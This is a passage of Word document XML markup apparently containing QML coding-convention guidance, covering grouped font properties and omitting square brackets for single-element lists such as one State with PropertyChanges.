        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.italic: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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font</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.pixelSize: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</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font</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">.capitalization: </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Font</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AllUppercase</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w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>could be written like this: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rectangle</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>anchors</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>left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left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top</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top</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right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right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leftMargin</w:t>
      </w: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20</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text</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text</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"hello"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00516C30" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>font</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bold</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>italic</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pixelSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>capitalization</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Font</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AllUppercase</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="566" w:name="lists"/>
      <w:bookmarkStart w:id="567" w:name="_Toc483000651"/>
      <w:bookmarkStart w:id="568" w:name="_Toc483003668"/>
      <w:bookmarkStart w:id="569" w:name="_Toc483604004"/>
      <w:bookmarkStart w:id="570" w:name="_Toc483605224"/>
      <w:bookmarkEnd w:id="566"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lists</w:t>
      </w:r>
      <w:bookmarkEnd w:id="567"/>
      <w:bookmarkEnd w:id="568"/>
      <w:bookmarkEnd w:id="569"/>
      <w:bookmarkEnd w:id="570"/>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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">If a list contains only </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>one</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> element, we generally </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>omit the square brackets</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>For example, it is very common for a component to only have one state.</w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case, instead of:</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name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>states</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</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name</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"open"</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type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00953F02">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target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container</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width</w:t>
      </w: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200</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w:t>
      </w:r>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lang w:val="en-US"/>
        </w:rPr>
        <w:t>we will write this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00516C30" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>states</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>State</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00516C30" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="string"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"open"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00516C30" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="type"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>PropertyChanges</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="name"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rStyle w:val="number"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00516C30" w:rsidRDefault="00953F02" w:rsidP="00953F02">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00953F02" w:rsidRPr="00953F02" w:rsidRDefault="00953F02" w:rsidP="00516C30">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="571" w:name="javascript-code"/>
      <w:bookmarkStart w:id="572" w:name="_Toc483000652"/>
      <w:bookmarkStart w:id="573" w:name="_Toc483003669"/>
      <w:bookmarkStart w:id="574" w:name="_Toc483604005"/>
      <w:bookmarkStart w:id="575" w:name="_Toc483605225"/>
      <w:bookmarkEnd w:id="571"/>
      <w:r w:rsidRPr="00516C30">
        <w:rPr>
